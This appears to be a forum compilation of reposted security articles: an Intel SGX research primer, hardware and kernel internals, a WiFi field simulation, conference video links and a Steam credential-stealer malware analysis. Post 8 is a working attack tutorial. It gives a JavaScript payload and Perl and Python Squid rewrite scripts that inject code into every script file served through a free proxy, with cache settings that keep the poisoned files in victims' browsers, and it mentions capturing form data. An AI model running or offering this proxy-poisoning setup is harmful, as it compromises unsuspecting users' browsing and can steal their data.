SE Enabled Technologies seeks to exploit the capabilities of SGX through the creation of software solutions. Currently, we are seeking to compliment Intel’s hardware solution through the use of a browser extension application. Using the browser extension, we can offer a wide array of security solutions from secure storage and transmission of documents to secure video streaming.

As of April 12, 2014, according to the Colorado Springs Undergraduate Research Forum proceedings, things had moved on:

In today’s increasingly digital world, more and more sensitive information is stored electronically, and more and more often this information comes under attack. With the continual evolution of offensive attack techniques, the need for more impressive defensive counter-measures is becoming apparent. As the requisite to fill this capability gap grows, so does the opportunity for businesses. Replacing the need for a countermeasure, recent developments in micro-processer technology have created a veritable impenetrable fortress to be placed inside modern day computer systems. The answer lies in Secure Enclaves - Enabled Technology, a software company that utilizes Intel Labs’ revolutionary Software Guard Extensions technology. Instead of relying on encryption and software, this technology is hardware-based, and is so secure that an NSA Red Team could not crack it.
This technology has tremendous application to both government and private organizations concerned about security. For completing a proof of concept case with the Department of Veterans’ Affairs, Secure Enclaves – Enabled Technologies will receive $500,000 that it will channel into the development of a commercially available security software package.

Further details around Secure Enclaves-Enabled Technologies can be found in the 2014 National Security Innovation Competition proceedings (page 57 onwards), including these points of interest:

SGX will be a standard component of Intel’s chipsets beginning in 2015. However, new software must be developed or current software must be adapted in order to have the ability to utilize the new set of instructions provided by the chipset. Without this critical software development, the cyber security solution afforded by SGX will lie dormant.

Microsoft: VC3

VC3 was published in October 2014 in the paper titled VC3: Trustworthy Data Analytics in the Cloud, for which the abstract states:

We present VC3, the first practical framework that allows users to run distributed MapReduce computations in the cloud while keeping their code and data secret, and ensuring the correctness and completeness of their results. VC3 runs on unmodified Hadoop, but crucially keeps Hadoop, the operating system and the hypervisor out of the TCB; thus, confidentiality and integrity are preserved even if these large components are compromised. VC3 relies on SGX processors to isolate memory regions on individual computers, and to deploy new protocols that secure distributed MapReduce computations.
VC3 optionally enforces region self-integrity invariants for all MapReduce code running within isolated regions, to prevent attacks due to unsafe memory reads and writes.

An interesting aspect of the Microsoft VC3 work is the adversary model they considered:

We consider a powerful adversary who may control the entire software stack in a cloud provider’s infrastructure, including hypervisor and OS. The adversary may also record, replay, and modify network packets. The adversary may also read or modify data after it left the processor using probing, DMA, or similar techniques. Our adversary may in particular access any number of other jobs running on the cloud, thereby accounting for coalitions of users and data center nodes. Further, we assume that the adversary is unable to physically open and manipulate at least those SGX-enabled processor packages that reside in the cloud provider’s data centers.

Microsoft: Haven

Haven was presented at USENIX in October 2014 in a paper titled Shielding applications from an untrusted cloud with Haven (slides etc. are available from USENIX), for which the abstract states:

Our prototype, Haven, is the first system to achieve shielded execution of unmodified legacy applications, including SQL Server and Apache, on a commodity OS (Windows) and commodity hardware. Haven leverages the hardware protection of Intel SGX to defend against privileged code and physical attacks such as memory probes, but also addresses the dual challenges of executing unmodified legacy binaries and protecting them from a malicious host. This work motivated recent changes in the SGX specification.
Further Applications

Two other papers related to how SGX can be applied are (both from Intel):

Using Innovative Instructions to Create Trustworthy Software Solutions
Innovative Technology for CPU Based Attestation and Sealing

Finally, there was some speculation that Ubuntu’s LXD, announced early November 2014, might use SGX. Ubuntu do state that:

We’re working with silicon companies to ensure hardware-assisted security and isolation for these containers, just like virtual machines today.

Emulator and CPU Support Status

By now you will no doubt be salivating at the prospect of SGX and want to prototype:

New first-of-its-kind malware which uses SGX, in preparation for BlackHat USA 2015, OR
A soft-HSM, OR
DRM extensions which use SGX

So what is the status of emulator and CPU support for SGX?

Emulators

Alas, no emulators are available to the public, although one does exist inside Intel and is shared with select partners. In June 2014 Intel said in the comments section of the Intel® SGX for Dummies (Intel® SGX Design Objectives) blog post:

Intel is not ready to announce plans for availability of SGX emulation platform yet, but this forum will be updated when we are ready.

So how did Microsoft develop their VC3 and Haven prototypes? In the Microsoft VC3 paper Microsoft said:

We successfully tested our implementation in an SGX emulator provided by Intel

More interestingly, they then go on to say:

However, since that emulator is not performance accurate, we have implemented our own software emulator for SGX. Our goal was to use SGX as specified in [31] as a concrete basis for our VC3 implementation and to obtain realistic estimates for how SGX would impact the performance of VC3. Our software emulator does not attempt to provide security guarantees. The emulator is implemented as a Windows driver. It hooks the KiDebugRoutine function pointer in the Windows kernel that is invoked on every exception received by the kernel.
Execution of an SGX opcode from [31] will generate an illegal instruction exception on existing processors, upon which the kernel will invoke our emulator via a call to KiDebugRoutine. The emulator contains handler functions for all SGX instructions used by VC3, including EENTER, EEXIT, EGETKEY, EREPORT, ECREATE, EADD, EEXTEND, and EINIT. We use the same mechanism to handle accesses to model specific registers (MSR) and control registers as specified in [31]. We also modified the SwapContext function in the Windows kernel to ensure that the full register context is loaded correctly during enclave execution.

In the Microsoft Haven research in October 2014 they said:

We developed Haven on an instruction-accurate SGX emulator provided by Intel, but evaluate it using our own model of SGX performance. Haven goes beyond the original design intent of SGX, so while the hardware was mostly sufficient, it did have three fundamental limitations for which we proposed fixes (§5.4). These are incorporated in a revised version of the SGX specification, published concurrently by Intel.

Note: The revised version they refer to is Rev 2 of the Intel® Software Guard Extensions Programming Reference.

Aside from this, there was a project at the Georgia Institute of Technology to add Intel SGX emulation to QEMU, which they appear to have achieved between their plan presentation on October 20, 2014 and their summary presentation on December 1, 2014. However, a quick search of the QEMU commits finds no reference to their work.

CPU Support

Currently there is no CPU on the market which supports the SGX or SGX2 instruction set.

Future Security Research

So first off, from reading the programming reference, some initial questions would be:

Do the 'SGX Enclave Control Structures' (SECS) have their integrity ensured? The SECSs contain meta-data used by the CPU to protect the enclave and will thus be a prime target.
Do the 'Thread Control Structures' (TCS) have their integrity ensured?
The TCSs contain meta-data used by the hardware to save and restore thread-specific information when entering/exiting the enclave.

Does the 'Enclave Page Cache Map' (EPCM) have its integrity ensured? The EPCM is used to keep track of which bits of memory are in the 'Enclave Page Cache' (EPC) and is 'managed by the processor'.

The reason for the above questions is driven in part by the obvious, but also by the fact that Intel mention that they stop certain concurrent operations to protect the integrity of these structures. It is also important to differentiate between the integrity provided by the Memory Encryption Engine (MEE – more on this later, as it provides protection against external memory modification) and that afforded by the microcode operating on these structures. In the presentation Dynamic Root of Trust and Trusted Execution we see that the MEE does provide integrity protection from external modification.

Some other questions which spring to mind include:

What are the algorithm and key generation mechanism for the 'Enclave Page Cache' (EPC)? The EPC is the RAM used by the secure enclaves; where it is part of the RAM it is protected by an encryption engine.
The whole debug problem.
If you compromise or own the underlying OS before attestation of the enclave has occurred, there is the obvious bootstrap problem, which the Trusted Computing Base (TCB) is designed to help with. This is also where remote attestation (as discussed by Joanna Rutkowska) will become critical, to detect whether an aggressor has pre-owned the environment, which would allow them to catch the provisioning process within the supposed secure enclave.

Source: Intel® Software Guard Extensions Programming Reference Rev 2 (#329298-002) – Page 177

Aside from the topics mentioned, it is clear that any microcode vulnerability or erratum that allows subversion of these mechanisms would be extremely valuable.
For example, the diagram below shows Processor Reserved Memory (PRM), which is used to house some of the structures mentioned in the question section.

Source: Intel® Software Guard Extensions Programming Reference Rev 2 (#329298-002) – Page 40

How is the integrity of the memory ensured in the EPC implementation? Looking at the related patent, Parallelized counter tree walk for low overhead memory replay protection:

As the lower-level counters (including L2, L1 and L0 counters and the version nodes 260) are off the processor die and therefore are susceptible to attacks, each counter and each version node are encoded with an embedded Message Authentication Code (MAC) (shown as the blocks with hatched lines) to ensure their integrity. In one embodiment, each embedded MAC is computed over the line in which they are embedded, using a corresponding counter from the next higher level as input. In the example of Figure 2, the embedded MAC for the version block 250 associated with L03 (shown in Figure 2 as the middle version block) is computed using the values of V0 - Vp and its corresponding L0 counter (L03). The value of this embedded MAC is stored striped in the line of the version blocks 250 (shown as striped boxes in Figure 2). The embedded MAC for each line of L0, L1 and L2 is computed similarly. L3 counters do not need embedded MACs because the contents of L3 counters are within the trusted boundary 205.

Finally, from a defensive standpoint, the impact on memory forensics and similar techniques is likely going to be substantial. Understanding the finer details will become critical.

Conclusions

Intel SGX is an interesting technology for numerous parties, both good and bad, outside of DRM. However, it is also clear that there is enough small print that the implementations across all families of CPU will warrant investigation when they become generally available.
From a vulnerability/attack research perspective, vulnerabilities in enclave-protected code (including brokers) as well as CPU microcode will become incredibly valuable, as will any attestation aspects. There will likely be renewed focus on understanding the exploitability of issues noted in Intel CPU errata to potentially subvert or otherwise influence control of an enclave. From a defensive standpoint, cloud and sensitive compartmentalised client-side operations become feasible without reliance on the security of underlying hypervisors or the performance/usability trade-offs of homomorphic encryption. Finally, imagine a world where LSASS on Microsoft Windows runs in an SGX enclave, so that even certain attacks implemented by Mimikatz are no longer possible.

Sursa: https://www.nccgroup.com/en/blog/2015/01/intel-software-guard-extensions-sgx-a-researchers-primer/#
8. Why are free proxies free?

because it's an easy way to infect thousands of users and collect their data

Posted by Christian Haschek on 29.05.13

© Anonymous wallpaper

I recently stumbled across a talk by Chema Alonso from the Defcon 20 conference where he was talking about how he created a Javascript botnet from scratch and how he used it to find scammers and hackers. Everything is done via a stock SQUID proxy with small config changes.

The idea is pretty simple:

[server] Install Squid on a linux server
[Payload] Modify the server so all transmitted javascript files get one extra piece of code that does things like send all data entered in forms to your server
[Cache] Set the caching time of the modified .js files as high as possible

https

This technique also works with https if the site loads unsafe resources (eg. jquery from a http site). Most browsers will tell you that, and some might even block the content, but usually nobody pays attention to the "lock" symbol.

To put it simply:

Safe:
Unsafe:

In the presentation Chema said he posted the IP of the modified server on the web, and after a few days there were over 5000 people using his proxy. Most people used it for bad things, because everyone "knows" you're only anonymous on the web when you've got a proxy, and it looks like many people don't think that the proxy could do something bad to them.

I was wondering if it really is that simple, so I took a VM running Debian and tried implementing the concept myself.

Make your own js infecting proxy

I assume that you have a squid proxy running; you'll also need a webserver like Apache using /var/www as web root directory (which is the default).

Step 1: Create a payload

For the payload I'll use a simple script that takes all links of a webpage and rewrites the href (link) attribute to my site.
/etc/squid/payload.js

for(var i=0;i<document.getElementsByTagName('a').length;i++)
    document.getElementsByTagName('a')[i].href = "https://blog.haschek.at";

Step 2: Write the script that poisons all requested .js files

/etc/squid/poison.pl

#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
while(<>) {
    chomp $_;
    if($_ =~ /(.*\.js)/i) {
        $url = $1;
        system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
        system("chmod o+r /var/www/tmp/$pid-$count.js");
        system("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
        print "http://127.0.0.1:80/tmp/$pid-$count.js\n";
    } else {
        print "$_\n";
    }
    $count++;
}

This script uses wget to retrieve the original javascript file the client asked for and adds the code from the /etc/squid/payload.js file to it. This modified file (which now contains our payload) will be sent to the client. You'll also have to create the folder /var/www/tmp and allow squid to write files in it. This folder is where all modified js scripts will be stored.

Step 3: Tell Squid to use the script above

In /etc/squid/squid.conf add:

url_rewrite_program /etc/squid/poison.pl

Step 4: Never let the cache expire

/var/www/tmp/.htaccess

ExpiresActive On
ExpiresDefault "access plus 3000 days"

These lines tell the apache server to give the poisoned files an insanely long expiration (caching) time, so they will sit in the user's browser cache until they clear it.

One more restart of squid and you're good to go. If you connect to the proxy and try to surf to any webpage, the page will be displayed as expected but all links will lead to this blog. The sneaky thing about this technique is that even when somebody disconnects from the proxy, the cached js files will most likely still be in their caches. In my example the payload does nothing too destructive and the user will know pretty fast that something is fishy, but with creative payloads all sorts of things could be implemented.
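The Perl rewriter above follows Squid's url_rewrite_program protocol: URLs arrive on stdin one per line, and the helper prints either the original URL or a replacement. A Python sketch of the same redirector logic is below; the paths and the localhost URL mirror the post's values, and the URL match is a simplified end-of-URL version of the Perl regex:

```python
# Sketch of the same Squid url_rewrite_program idea in Python: poison
# requested .js files with an appended payload, pass everything else through.
import os
import re
import subprocess
import sys

PAYLOAD = "/etc/squid/payload.js"   # same payload file as above
WEBROOT = "/var/www/tmp"            # must be writable by squid

def is_js(url):
    """Simplified version of the Perl match: URL ends in .js (any case)."""
    return bool(re.search(r"\.js$", url, re.IGNORECASE))

def local_name(pid, count):
    """Unique local filename per helper process and request, as in the post."""
    return os.path.join(WEBROOT, "%d-%d.js" % (pid, count))

def poison(url, count, pid=None):
    """Fetch url with wget, append the payload, return the rewritten URL."""
    pid = os.getpid() if pid is None else pid
    local = local_name(pid, count)
    subprocess.call(["/usr/bin/wget", "-q", "-O", local, url])
    with open(local, "ab") as out, open(PAYLOAD, "rb") as pay:
        out.write(pay.read())
    os.chmod(local, 0o644)
    return "http://127.0.0.1:80/tmp/" + os.path.basename(local)

def rewrite_loop(inp=sys.stdin, out=sys.stdout):
    """Run this as Squid's url_rewrite_program instead of poison.pl."""
    for count, line in enumerate(inp):
        fields = line.split()
        url = fields[0] if fields else ""
        out.write((poison(url, count) if is_js(url) else line.rstrip("\n")) + "\n")
        out.flush()
```

Wired in with `url_rewrite_program /etc/squid/poison.py`, this behaves like the Perl original; note Squid actually passes extra fields after the URL on each line, which both versions ignore.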
Tell your friends never to use free proxies because many hosts do things like that. Be safe on the web (but not with free proxies) Sursa: https://blog.haschek.at/post/fd9bc
  9. Video archives of security conferences Just some links for your enjoyment List of security conferences in 2014 Video archives: Blackhat 2012 Botconf 2013 Bsides Bsides Cleveland 2012 BsidesCLE Chaos Communication Congress Chaos Communications Channel YouTube 31c3 Recordings Defcon Defcon: All Conference CDs and DVDs with Presentation PDF files (updated 2014 for DEF CON 22): Torrent Defcon: all other Derbycon Digital Bond's S4x14 Digital Bond's S4x14 ISC Security Circle City Con GrrCON Information Security Summit & Hacker Conference Hack in the box HITB 2011 InfowarCon InfowarCon 2014 Free and Open Source Software Conference 2014 froscon2014 International Cyber Security Conference KIACS Cyber Security Conference KIACS 2014 Louisville NATO Cyber Security Conference Notacon Notacon 2013 Nullcon Nullcon 2014 Nullcon 2013 Nullcon 2012 OWASP AppSec EU Research 2013 AppSecUSA 2012 AppSecUSA 2011 RSA Videos Ruxcon Shmoocon Shmoocon 2014 Troopers OISF OHM OHM2013. Observe, Hack, Make Special thanks to Adrian Crenshaw for his collection of videos Posted by Mila Sursa: contagio: Video archives of security conferences
10. Hard disk hacking - Intro

Intro

Apart from this article, I also gave a talk at OHM2013 about this subject. The video of that talk (minus the first few minutes) is now online.

Hard disks: if you read this, it's pretty much certain you use one or more of the things. They're pretty simple: they basically present a bunch of 512-byte sectors, numbered by an increasing address, also known as the LBA or Logical Block Address. The PC the HD is connected to can read or write data to and from these sectors. Usually, a file system is used that abstracts all those sectors to files and folders.

If you look at an HD from that naive standpoint, you would think the hardware should be pretty simple: all you need is something that connects to a SATA port which can then position the read/write head and read or write data from or to the platters. But maybe more is involved: don't hard disks also handle bad block management and SMART attributes, and don't they usually have some cache they must somehow manage?

All that implies there's some intelligence in a hard disk, and intelligence usually implies hackability. I'm always interested in hackability, so I decided I wanted to look into how hard disks work on the non-mechanical level. Research like this has been done before for various bits of hardware: from PCI extension cards to embedded controllers in laptops to even Apple keyboards. Usually the research has been done in order to prove that the hackability of these devices can lead to compromised software, so I decided to take the same approach: for this hack, I wanted to make a hard disk that could bypass software security.

Articol complet: Sprites mods - Hard disk hacking - Intro
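The LBA scheme the article describes replaced the older cylinder/head/sector (CHS) addressing, and the mapping between the two is simple arithmetic worth having to hand when poking at disks. A small sketch (the 16-head/63-sector geometry below is just an illustrative classic BIOS geometry, not from the article):

```python
# Convert between CHS (cylinder/head/sector) and LBA addressing.
# Note the historical quirk: sectors are 1-based in CHS, everything else 0-based.

def chs_to_lba(c, h, s, heads_per_cyl, sectors_per_track):
    """LBA = (C * HPC + H) * SPT + (S - 1)"""
    return (c * heads_per_cyl + h) * sectors_per_track + (s - 1)

def lba_to_chs(lba, heads_per_cyl, sectors_per_track):
    """Inverse mapping, returning (cylinder, head, sector)."""
    c, rem = divmod(lba, heads_per_cyl * sectors_per_track)
    h, s = divmod(rem, sectors_per_track)
    return c, h, s + 1

def lba_to_byte_offset(lba, sector_size=512):
    """A 512-byte sector at LBA n starts at byte n * 512 on the naive disk image."""
    return lba * sector_size
```

For example, with 16 heads and 63 sectors per track, CHS (0, 0, 1) is LBA 0, and the two functions round-trip for any LBA.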
11. [h=1]RootFW 4[/h]

An Android Root Shell Framework

RootFW is a tool that helps Android applications act as root. The only way for an application to perform tasks as root is by executing shell commands, as Android has no native way of doing this. However, due to the different types of shell support on different devices/ROMs (shell type, busybox/toolbox versions etc.), this is not an easy task. RootFW comes with a lot of pre-built methods to handle the most common tasks. Each method tries to support as many different environments as possible by implementing different approaches for each environment. This makes the work of app developers a lot easier.

Check out the Wiki page for further info

Sursa: https://github.com/SpazeDog/rootfw
12. Kernel booting process. Part 1.

If you have read my previous blog posts, you can see that some time ago I started to get involved with low-level programming. I wrote some posts about x86_64 assembly programming for Linux. At the same time, I started to dive into the Linux source code. It is very interesting for me to understand how low-level things work: how programs run on my computer, how they are located in memory, how the kernel manages processes and memory, how the network stack works at a low level, and many many other things. So I decided to write yet another series of posts about the Linux kernel for x86_64.

Note that I'm not a professional kernel hacker, and I don't write code for the kernel at work. It's just a hobby. I just like low-level stuff, and it is interesting for me to see how these things work. So if you notice anything confusing, or if you have any questions/remarks, ping me on twitter 0xAX, drop me an email or just create an issue. I appreciate it. All posts will also be accessible at linux-internals, and if you find something wrong with my English or the post content, feel free to send a pull request. Note that this isn't official documentation, just learning and knowledge sharing.

Required knowledge

Understanding C code
Understanding assembly code (AT&T syntax)

Anyway, if you are just starting to learn these tools, I will try to explain some parts during this and the following posts. OK, little introduction finished, and now we can start to dive into the kernel and low-level stuff.

All code is current as of kernel 3.18; if anything changes, I will update the posts.

Magic power button, what's next?

Although this is a series of posts about the Linux kernel, we will not start from the kernel code (at least not in this paragraph). OK, you pressed the magic power button on your laptop or desktop computer and it started to work. The motherboard sends a signal to the power supply, and the power supply provides the computer with the proper amount of electricity.
Once the motherboard receives the power good signal, it tries to start the CPU. The CPU resets all leftover data in its registers and sets up predefined values for each register. 80386 and later CPUs define the following predefined data in CPU registers after the computer resets:

IP          0xfff0
CS selector 0xf000
CS base     0xffff0000

The processor now works in real mode, and we need to make a little retreat to understand memory segmentation in this mode. Real mode is supported on all x86-compatible processors, from the 8086 to modern Intel 64-bit CPUs. The 8086 processor had a 20-bit address bus, which means that it could work with a 0-2^20 byte address space (1 megabyte). But it only had 16-bit registers, and with 16-bit registers the maximum address is 2^16 - 1 or 0xffff (64 kilobytes). Memory segmentation was used to make use of all of the address space. All memory was divided into small, fixed-size segments of 65536 bytes, or 64 KB.

Articol complet: https://github.com/0xAX/linux-insides/blob/master/linux-bootstrap-1.md
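The segment:offset arithmetic behind real-mode addressing (and the reset values quoted in the post) can be checked with a few lines of Python; the computation here is the standard scheme, with only the printed hex values as my own worked example:

```python
# Real mode: physical address = (segment << 4) + offset, giving 20 usable bits.
def real_mode_addr(segment, offset):
    return ((segment << 4) + offset) & 0xFFFFF  # the 8086 wraps at 1 MB

# With the reset values from the post (CS selector 0xf000, IP 0xfff0),
# a plain 8086 would fetch its first instruction from:
print(hex(real_mode_addr(0xF000, 0xFFF0)))   # 0xffff0

# Modern CPUs instead use the hidden CS base of 0xffff0000, so the first
# instruction is fetched from the top of the 32-bit address space:
print(hex(0xFFFF0000 + 0xFFF0))              # 0xfffffff0
```

This is why the reset vector sits just below 4 GB on modern parts even though the visible CS:IP pair looks like a 1 MB real-mode address.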
13. Helmhurts

A few posts back I was concerned with optimising the WiFi reception in my flat, and I chose a simple method for calculating the distribution of electromagnetic intensity. I casually mentioned that I really should be doing things more rigorously by solving the Helmholtz equation, but then didn't. Well, spurred on by a shocking amount of spare time, I've given it a go here.

UPDATE: Android app now available, see this post for details.

The Helmholtz equation is used in the modelling of the propagation of electromagnetic waves. More precisely, if the time-dependence of an electromagnetic wave can be assumed to be of the form $e^{i\omega t}$, and the dispersion relation is given by $k = n\omega/c$ for some refractive index distribution $n(x,y)$, then the electric field $E$ solves

$\nabla^2 E + \frac{n^2\omega^2}{c^2}E = f,$

where $f$ is some source function. Given a source of radiation and a geometry to propagate in, in principle the Helmholtz equation can be solved for the entire radiation field $E$. In practice this may not be so simple.

Here I chose to model a situation in 2D, and set up a computational grid of size $N \times M$ with grid cells labelled $(i,j)$ for $1 \le i \le N$, $1 \le j \le M$. Given this discretisation, the equation above becomes (with grid spacing $h$)

$\frac{E_{i+1,j} + E_{i-1,j} + E_{i,j+1} + E_{i,j-1} - 4E_{i,j}}{h^2} + \frac{n_{ij}^2\omega^2}{c^2}E_{i,j} = f_{i,j}.$

This is a linear equation in the 'current' cell $E_{i,j}$ as a function of its 4 neighbours. Each cell has an equation describing the relationship with its neighbours, so there are $NM$ equations in $NM$ unknowns. This motivates a linear algebraic approach to the problem – if all equations can be represented as one giant matrix equation, that matrix can be inverted and an exact solution for $E$ recovered. In particular we'll have $A\mathbf{E} = \mathbf{f}$ for some matrix $A$, and we can compute $\mathbf{E} = A^{-1}\mathbf{f}$. This is slightly tricky due to the fact that the 2D labelling system $(i,j)$ needs to be converted to a 1D labelling system $k$, as the 2D simulation domain needs to be converted to a 1D vector. I use the translation $k = i + (j-1)N$, so that $1 \le k \le NM$. A pair of cells $(i,j)$ and $(i,j\pm1)$ are then separated by $N$ in this new labelling system, and a pair of cells $(i,j)$ and $(i\pm1,j)$ separated by 1.
The row in the matrix equation corresponding to the $k$th cell then has nonzero entries in columns $k-N$, $k-1$, $k$, $k+1$ and $k+N$, with $N-2$ blank cells between the $k\pm1$ and $k\pm N$ entries. In fact, it is clear that the vast majority of the matrix is zero, which can help when considering the sheer size of the matrix. For this problem a room is approximately 5 m across, and the wavelength to resolve is around 5 cm. We will require $N > 500$ or so then, which means the number of elements is around $10^{10}$! Storing each as a single precision number would require around 60 GB of RAM, and my poor battered laptop wouldn't have a chance inverting that matrix even if it would fit in memory.

Fortunately this problem has crept up on people cleverer than I, and they invented the concept of the sparse matrix, or a matrix filled mostly with zeros. We can visualise the structure of our matrix using the handy Matlab function spy – as plotted below, it shows which elements of the matrix are nonzero. Here the matrix dimension is $NM = 28$, so there are 784 elements in the matrix. However only 64 of those are nonzero, so just 8% of the matrix is actually useful in computation! This drops to 4% if the resolution of our grid jumps by a factor of 10, and stays around 5% for another factor of 10. There is a special data structure in Matlab for sparse matrices, and using it speeds up calculation of inverses by orders of magnitude. In this case the code is literally a hundred times faster and uses a fraction of the memory.

Moving on to the physics then, what does a solution of the Helmholtz equation look like? On the unit square for large $\omega$, the quickest way to find out is actually to use a packet of rice. In this calculation I've set boundary conditions such that $E = 0$ on the edges of the square, and set $f$ to a point source at the centre. It turns out that the Helmholtz equation can also be applied to the modelling of the forced vibrations of a square plate, where the choice of conditions above equates to applying a force at the centre of the plate and clamping the edges.
The rice/sand/etc settles at the nodes of the plate, i.e. the positions which stay stationary in the oscillation. Visualised below are a selected few pretty pictures where I've taken a logarithmic colour scale to highlight the positions of zero electric field – the 'nodes'. As the animation proceeds, $\omega$ starts high and gradually gets lower, corresponding to fast plate oscillations gradually getting slower. Once again physics has turned out unexpectedly pretty and distracted me away from my goal, and this post becomes a microcosm of the entire concept of the blog…

Moving onwards, I'll recap the layout of the flat where I'm hoping to improve the signal reaching my computer from my WiFi router:

I can use this image to act as a refractive index map – walls have a very high refractive index, and empty space has a refractive index of 1. I then set up the WiFi antenna as a small radiation source hidden away somewhat uselessly in the corner. Starting with a radiation wavelength of 10 cm, I end up with an electromagnetic intensity map which looks like this:

This is, well, surprisingly great to look at, but very much unexpected. I would have expected to see some region of 'brightness' around the electromagnetic source, fading away into the distance, perhaps with some funky diffraction effects going on. Instead we get a wispy structure with filaments of strong field strength snaking their way around. There are noticeable black spots too, recognisable to anyone who's shifted position in a chair and had their phone conversation dropped.

What if we stuck the router in the kitchen? This seems to help the reception in all of the flat except the bedrooms, though we would have to deal with lightning striking the cupboard under the stairs, it seems.

What about smack bang in the middle of the flat? That's more like it! Tendrils of internet goodness can get everywhere, even into the bathroom where no one at all occasionally reads BBC News with numb legs.
Unfortunately this is probably not a viable option. Actually the distribution of field strength seems extremely sensitive to every parameter, be it the position of the router, the wavelength of the radiation, or the refractive index of the front door. This probably requires some averaging over parameters or a grid convergence scan, but given it takes this laptop 10 minutes or so to conjure up each of the above images, that’s probably out of the question for now. UPDATE As suggested by a helpful commenter, I tried adding in an imaginary component of the refractive index for the walls, taken from here. This allows for some absorption in the concrete, and stops the perfect reflections forming a standing wave which almost perfectly cancels everything out. The results look like something I would actually expect: END UPDATE It’s quite surprising that the final results should be so sensitive, but given we’re performing a matrix inversion in the solution, the field strength at every position depends on the field strength at every other position. This might seem to be invoking some sort of non-local interaction of the electromagnetic field, but actually it’s just due to the way we’ve decided to solve the problem. The Helmholtz equation implicitly assumes a solution independent of time, other than a sinusoidal oscillation. What we end up with is then a system at equilibrium, oscillating back and forth as a trapped standing wave. In effect the antenna has been switched on for an infinite amount of time and all possible reflections, refractions, transmissions etc. have been allowed to happen. There is certainly enough time for all parts of the flat to affect every other part of the flat then, and ‘non-locality’ isn’t an issue. In a practical sense, after a second the electromagnetic waves have had time to zip around the place billions of times and so equilibrium happens extremely quickly.
Now it’s all very well and good to chat about this so glibly, because we’re all physicists and 90% of the time we’re rationalising away difficult-to-do things as ‘obvious’ or ‘trivial’ to avoid doing any work. Unfortunately for me the point of this blog is to do lots of work in my spare time while avoiding doing anything actually useful, so let’s see if we can’t have a go at the time-dependent problem. Once we start reintroducing ∂/∂t’s into the Helmholtz equation it’s actually not an approximation at all any more and we’re back to solving the full set of Maxwell’s equations. This is exactly what the FDTD technique achieves – Finite Difference Time Domain. The FD means we’re solving equations on a grid, and the TD just makes it all a bit harder. To be specific there is a simple algorithm to march Maxwell’s equations forwards in time, namely

E(t + δt) = E(t) + δt/(ε_r ε₀) [ ∇ × B/(μ_r μ₀) − J ]
B(t + δt) = B(t) − δt ∇ × E

I’ve introduced a current source J and the relative permittivity/permeability ε_r and μ_r, such that ε = ε_r ε₀ and μ = μ_r μ₀. We can use all of the machinery mentioned above to discretise the flat layout into a grid, but this time repeatedly apply the above equations. All 6 variables are stored on the grid and updated for every time step. The RAM requirements aren’t so strict in this case, which would allow me to model the full flat down to millimetre resolution, but this is just too slow. A full simulation might take all day, and even I can’t justify that. Running one at a longer wavelength, 30 cm, allows me to drop the resolution enough to run a quick simulation before I go to bed. With the router in approximately the correct place, you can see the radiation initially stream out of the router. There are a few reflections at first, but once the flat has been filled with field it becomes static quite quickly, and settles into an oscillating standing wave. This looks very much like the ‘infinite time’ Helmholtz solution above, albeit at a longer wavelength, and justifies some of the hand-waving ‘intuition’ I tried to fool you with. Sursa: Helmhurts | Almost looks like work
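The flavour of the FDTD marching scheme described in the post above can be captured in a few lines of 1D Python. This is a sketch only: field names, grid size and the Gaussian source are illustrative (the post itself works in 2D with all 6 field components), and units are normalised so the Courant number is 1:

```python
import math

def fdtd_1d(cells=200, steps=300):
    """Minimal 1D leapfrog scheme: E and H are staggered in space
    and time, stepped at the 'magic' time step (Courant number 1),
    with an additive Gaussian pulse source near the left edge."""
    ez = [0.0] * cells
    hy = [0.0] * cells
    for t in range(steps):
        # update H from the spatial difference (curl) of E
        for k in range(cells - 1):
            hy[k] += ez[k + 1] - ez[k]
        # update E from the spatial difference (curl) of H
        for k in range(1, cells):
            ez[k] += hy[k] - hy[k - 1]
        # inject a Gaussian pulse at cell 10
        ez[10] += math.exp(-((t - 30) ** 2) / 100.0)
    return ez

ez = fdtd_1d()
print(max(abs(v) for v in ez) > 0)  # True: the pulse has propagated
```

Eliminating H from the two updates recovers the standard second-order wave-equation leapfrog, which is exactly stable at this time step; the 2D/3D version adds the remaining field components and the ε_r, μ_r material factors from the equations above.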
14. Analysis of Steam stealers and the ‘Steam Stealer Extreme’ service Back at the end of November I started to spot some steam stealing malware in a backdoored Mumble installer: Samples of these kinds of stealers appeared more and more often. Around mid-December I ended up with 14 unique samples that were actively spread around (see the end of this post for hashes and downloads for these samples): All of them except one are around 250kb or more in size. Only one sample, called ‘SteamDouble.exe’, was 69kb in size: File name: SteamDouble.exe File size: 69.0 KB ( 70656 bytes ) First seen: 2014-12-07 MD5: 5f50e810668942e8d694faeabab08260 SHA1: b44c087039ea90569291bfe1105693417fb2f84d SHA256: 21c93477c200563fea732253f0eb2814b17b324e5d533a7c347b1bd7c6267987 ssdeep: 1536:NrNoD6y4E/+JWiiVUIekBixa7vq5KwSTPxkjL/Gv:NrNADqWii2IekBMa7v9wSYY VirusTotal: https://www.virustotal.com/en/file/21c93477c200563fea732253f0eb2814b17b324e5d533a7c347b1bd7c6267987/analysis/ Malwr (Downloadable sample): https://malwr.com/analysis/NDQwMzE3ZTI4OTc5NGZkYmI4MDc4YzhhNDMwOGFmNjA/ STEAMDOUBLE/BRUTALITY analysis The ‘SteamDouble.exe’ sample came from a link originally sent in a Steam chat message. The text of the message was: “lol, wtf? http://img-pic[.]com/image612_14[.]jpeg”. When visiting this link the server on the other end responded with: HTTP/1.1 301 Moved Permanently Server: nginx Date: Sun, 04 Jan 2015 14:15:03 GMT Content-Type: text/html; charset=iso-8859-1 Connection: keep-alive Location: http://goo[.]gl/QaidJm This was a redirect towards a Google shortlink: “goo[.]gl/QaidJm”. In turn this shortlink redirects towards the ‘steamdouble[.]com’ website: It advertises the so-called ‘CS:GO Skin Duplicator’. The files for this tool are hosted on a filesharing service from Russia called ‘exfile.ru’. The website itself also features a video showing the usage of the tool: The video shows a tool which allows, as the tool’s name says, a user to duplicate CS:GO items.
